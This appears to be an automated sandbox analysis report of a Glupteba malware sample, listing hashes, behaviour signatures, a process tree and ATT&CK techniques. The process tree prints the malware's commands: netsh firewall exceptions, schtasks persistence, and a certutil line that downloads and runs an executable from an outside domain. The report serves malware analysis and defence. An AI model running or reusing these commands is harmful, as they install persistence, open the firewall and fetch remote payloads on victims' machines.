Analysis

  • max time kernel
    151s
  • max time network
    157s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    24-05-2022 13:47

General

  • Target

    ce66310aced7f576549cd39457bbf6a8425c1a0943510d75f7d7ce72b90fdfc0.exe

  • Size

    3MB

  • MD5

    2064e3bb7a3826464992decb043a1c13

  • SHA1

    ac04cc98f073e6ee77fb56430578b20b07bb9fb0

  • SHA256

    ce66310aced7f576549cd39457bbf6a8425c1a0943510d75f7d7ce72b90fdfc0

  • SHA512

    9dc5847a95df367f3be4d0dac56afdfd580c1d53b1ca2266cc06e22c9d7b708fcae8f7971fe9d9b848bdb1e8bf8ed9f61334d8a19e68fc400fde269bbb5614c7

Malware Config

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 4 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
  • Executes dropped EXE 2 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Modifies boot configuration data using bcdedit 1 IoCs
  • Drops file in System32 directory 8 IoCs
  • Drops file in Windows directory 4 IoCs
  • Program crash 64 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 21 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ce66310aced7f576549cd39457bbf6a8425c1a0943510d75f7d7ce72b90fdfc0.exe
    "C:\Users\Admin\AppData\Local\Temp\ce66310aced7f576549cd39457bbf6a8425c1a0943510d75f7d7ce72b90fdfc0.exe"
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:3764
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3764 -s 332
      • Program crash
      PID:2428
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3764 -s 336
      • Program crash
      PID:2352
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3764 -s 336
      • Program crash
      PID:4824
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3764 -s 608
      • Program crash
      PID:3760
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3764 -s 708
      • Program crash
      PID:4476
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3764 -s 696
      • Program crash
      PID:3536
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3764 -s 696
      • Program crash
      PID:3644
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3764 -s 756
      • Program crash
      PID:2340
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3764 -s 772
      • Program crash
      PID:4712
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3764 -s 608
      • Program crash
      PID:4368
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3764 -s 860
      • Program crash
      PID:4344
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3764 -s 660
      • Program crash
      PID:4308
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3764 -s 644
      • Program crash
      PID:316
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3764 -s 816
      • Program crash
      PID:2116
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3764 -s 608
      • Program crash
      PID:5092
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3764 -s 764
      • Program crash
      PID:4128
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3764 -s 852
      • Program crash
      PID:916
    • C:\Users\Admin\AppData\Local\Temp\ce66310aced7f576549cd39457bbf6a8425c1a0943510d75f7d7ce72b90fdfc0.exe
      "C:\Users\Admin\AppData\Local\Temp\ce66310aced7f576549cd39457bbf6a8425c1a0943510d75f7d7ce72b90fdfc0.exe"
      • Adds Run key to start application
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:4764
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 4764 -s 296
        • Program crash
        PID:3620
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 4764 -s 300
        • Program crash
        PID:4676
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 4764 -s 300
        • Program crash
        PID:2344
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 4764 -s 640
        • Program crash
        PID:520
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 4764 -s 680
        • Program crash
        PID:3892
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 4764 -s 696
        • Program crash
        PID:4432
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 4764 -s 716
        • Program crash
        PID:1232
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 4764 -s 732
        • Program crash
        PID:2776
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 4764 -s 756
        • Program crash
        PID:428
      • C:\Windows\system32\cmd.exe
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\57c765cfdfac\57c765cfdfac\57c765cfdfac.exe" enable=yes"
        • Suspicious use of WriteProcessMemory
        PID:1316
        • C:\Windows\system32\netsh.exe
          netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\57c765cfdfac\57c765cfdfac\57c765cfdfac.exe" enable=yes
            PID:1500
        • C:\Windows\system32\cmd.exe
          C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
          • Suspicious use of WriteProcessMemory
          PID:3128
          • C:\Windows\system32\netsh.exe
            netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
              PID:1656
          • C:\Windows\rss\csrss.exe
            C:\Windows\rss\csrss.exe ""
            • Executes dropped EXE
            • Drops file in System32 directory
            • Drops file in Windows directory
            • Modifies data under HKEY_USERS
            • Modifies system certificate store
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2660
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 332
              • Program crash
              PID:3988
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 336
              • Program crash
              PID:1868
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 336
              • Program crash
              PID:4660
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 520
              • Program crash
              PID:3580
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 544
              • Program crash
              PID:4072
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 504
              • Program crash
              PID:4380
            • C:\Windows\SYSTEM32\schtasks.exe
              schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
              • Creates scheduled task(s)
              PID:3968
            • C:\Windows\SYSTEM32\schtasks.exe
              schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://gfixprice.space/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
              • Creates scheduled task(s)
              PID:4104
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 848
              • Program crash
              PID:1388
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 848
              • Program crash
              PID:720
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 848
              • Program crash
              PID:3104
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 848
              • Program crash
              PID:2860
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 920
              • Program crash
              PID:544
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 944
              • Program crash
              PID:3084
            • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
              "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
              • Executes dropped EXE
              PID:2396
            • C:\Windows\system32\bcdedit.exe
              C:\Windows\Sysnative\bcdedit.exe /v
              • Modifies boot configuration data using bcdedit
              PID:1676
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 1020
              • Program crash
              PID:360
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 964
              • Program crash
              PID:5116
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 1072
              • Program crash
              PID:4792
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 456
              • Program crash
              PID:116
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 1128
              • Program crash
              PID:2224
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 1160
              • Program crash
              PID:5092
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 1176
              • Program crash
              PID:2088
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 1172
              • Program crash
              PID:916
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 1632
              • Program crash
              PID:1184
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 1820
              • Program crash
              PID:3924
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 1812
              • Program crash
              PID:768
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 1244
              • Program crash
              PID:4172
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 1552
              • Program crash
              PID:1116
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 1916
              • Program crash
              PID:884
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 1040
              • Program crash
              PID:2408
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 1896
              • Program crash
              PID:4452
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 1552
              • Program crash
              PID:4224
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 1660
              • Program crash
              PID:3316
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 440
              • Program crash
              PID:2308
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 1068
              • Program crash
              PID:4740
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 1740
              • Program crash
              PID:3128
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 1716
              • Program crash
              PID:2572
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 1576
              • Program crash
              PID:3432
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 1716
              • Program crash
              PID:3464
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 1716
                PID:1868
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 1920
                  PID:4668
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 1896
                    PID:1560
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 1848
                      PID:3456
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 1000
                        PID:3836
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 456
                          PID:2428
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 4764 -s 860
                        • Program crash
                        PID:1936
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 3764 -s 868
                      • Program crash
                      PID:1136
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3764 -ip 3764
                      PID:1416
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 3764 -ip 3764
                        PID:3036
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 3764 -ip 3764
                          PID:4716
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 3764 -ip 3764
                            PID:1768
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 3764 -ip 3764
                              PID:2688
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 3764 -ip 3764
                                PID:3052
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 3764 -ip 3764
                                  PID:1916
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 3764 -ip 3764
                                    PID:3168
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 3764 -ip 3764
                                      PID:4908
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 3764 -ip 3764
                                        PID:3984
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 3764 -ip 3764
                                          PID:2792
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 3764 -ip 3764
                                            PID:456
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 3764 -ip 3764
                                              PID:116
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 3764 -ip 3764
                                                PID:1724
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 3764 -ip 3764
                                                  PID:684
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 3764 -ip 3764
                                                    PID:4540
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 3764 -ip 3764
                                                      PID:4256
                                                    • C:\Windows\system32\svchost.exe
                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
                                                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      • Suspicious use of WriteProcessMemory
                                                      PID:4648
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 3764 -ip 3764
                                                        PID:556
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 4764 -ip 4764
                                                          PID:4144
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 4764 -ip 4764
                                                            PID:1820
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4764 -ip 4764
                                                              PID:2244
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 4764 -ip 4764
                                                                PID:1092
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4764 -ip 4764
                                                                  PID:3600
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 4764 -ip 4764
                                                                    PID:3016
                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 4764 -ip 4764
                                                                      PID:4568
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 4764 -ip 4764
                                                                        PID:2248
                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 4764 -ip 4764
                                                                          PID:984
                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 4764 -ip 4764
                                                                            PID:2576
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 2660 -ip 2660
                                                                              PID:1780
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 2660 -ip 2660
                                                                                PID:3484
                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 672 -p 2660 -ip 2660
                                                                                  PID:2772
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 2660 -ip 2660
                                                                                    PID:1988
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 2660 -ip 2660
                                                                                      PID:1504
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 2660 -ip 2660
                                                                                        PID:4316
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 2660 -ip 2660
                                                                                          PID:1872
                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 2660 -ip 2660
                                                                                            PID:1892
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 672 -p 2660 -ip 2660
                                                                                              PID:2764
                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 2660 -ip 2660
                                                                                                PID:3760
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 2660 -ip 2660
                                                                                                  PID:2988
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 2660 -ip 2660
                                                                                                    PID:3188
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 676 -p 2660 -ip 2660
                                                                                                      PID:3908
                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 2660 -ip 2660
                                                                                                        PID:4368
                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 2660 -ip 2660
                                                                                                          PID:1356
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 2660 -ip 2660
                                                                                                            PID:4308
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 2660 -ip 2660
                                                                                                              PID:3116
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 2660 -ip 2660
                                                                                                                PID:684
                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 2660 -ip 2660
                                                                                                                  PID:2520
                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 2660 -ip 2660
                                                                                                                    PID:4256
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 672 -p 2660 -ip 2660
                                                                                                                      PID:4616
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 2660 -ip 2660
                                                                                                                        PID:2060
                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 668 -p 2660 -ip 2660
                                                                                                                          PID:3772
                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 2660 -ip 2660
                                                                                                                            PID:1292
                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 2660 -ip 2660
                                                                                                                              PID:4680
                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 676 -p 2660 -ip 2660
                                                                                                                                PID:3340
                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 2660 -ip 2660
                                                                                                                                  PID:3680
                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 688 -p 2660 -ip 2660
                                                                                                                                    PID:4772
                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 2660 -ip 2660
                                                                                                                                      PID:2756
                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 2660 -ip 2660
                                                                                                                                        PID:1952
                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 2660 -ip 2660
                                                                                                                                          PID:2076
                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 2660 -ip 2660
                                                                                                                                            PID:1392
                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 684 -p 2660 -ip 2660
                                                                                                                                              PID:4892
                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 2660 -ip 2660
                                                                                                                                                PID:2440
                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 2660 -ip 2660
                                                                                                                                                  PID:1936
                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 2660 -ip 2660
                                                                                                                                                    PID:8
                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 2660 -ip 2660
                                                                                                                                                      PID:3364
                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 688 -p 2660 -ip 2660
                                                                                                                                                        PID:4504
                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 2660 -ip 2660
                                                                                                                                                          PID:2832
                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 684 -p 2660 -ip 2660
                                                                                                                                                            PID:3980
                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 2660 -ip 2660
                                                                                                                                                              PID:4076
                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 2660 -ip 2660
                                                                                                                                                                PID:4896

                                                                                                                                                              Network

                                                                                                                                                              MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                              Execution

                                                                                                                                                              Scheduled Task

                                                                                                                                                              1
                                                                                                                                                              T1053

                                                                                                                                                              Persistence

                                                                                                                                                              Modify Existing Service

                                                                                                                                                              1
                                                                                                                                                              T1031

                                                                                                                                                              Registry Run Keys / Startup Folder

                                                                                                                                                              1
                                                                                                                                                              T1060

                                                                                                                                                              Scheduled Task

                                                                                                                                                              1
                                                                                                                                                              T1053

                                                                                                                                                              Privilege Escalation

                                                                                                                                                              Scheduled Task

                                                                                                                                                              1
                                                                                                                                                              T1053

                                                                                                                                                              Defense Evasion

                                                                                                                                                              Modify Registry

                                                                                                                                                              2
                                                                                                                                                              T1112

                                                                                                                                                              Install Root Certificate

                                                                                                                                                              1
                                                                                                                                                              T1130

                                                                                                                                                              Discovery

                                                                                                                                                              Query Registry

                                                                                                                                                              1
                                                                                                                                                              T1012

                                                                                                                                                              Replay Monitor

                                                                                                                                                              00:00 00:00

                                                                                                                                                              Downloads

                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
                                                                                                                                                                Filesize

                                                                                                                                                                1MB

                                                                                                                                                                MD5

                                                                                                                                                                13aaafe14eb60d6a718230e82c671d57

                                                                                                                                                                SHA1

                                                                                                                                                                e039dd924d12f264521b8e689426fb7ca95a0a7b

                                                                                                                                                                SHA256

                                                                                                                                                                f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

                                                                                                                                                                SHA512

                                                                                                                                                                ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

                                                                                                                                                              • C:\Windows\rss\csrss.exe
                                                                                                                                                                Filesize

                                                                                                                                                                3MB

                                                                                                                                                                MD5

                                                                                                                                                                2064e3bb7a3826464992decb043a1c13

                                                                                                                                                                SHA1

                                                                                                                                                                ac04cc98f073e6ee77fb56430578b20b07bb9fb0

                                                                                                                                                                SHA256

                                                                                                                                                                ce66310aced7f576549cd39457bbf6a8425c1a0943510d75f7d7ce72b90fdfc0

                                                                                                                                                                SHA512

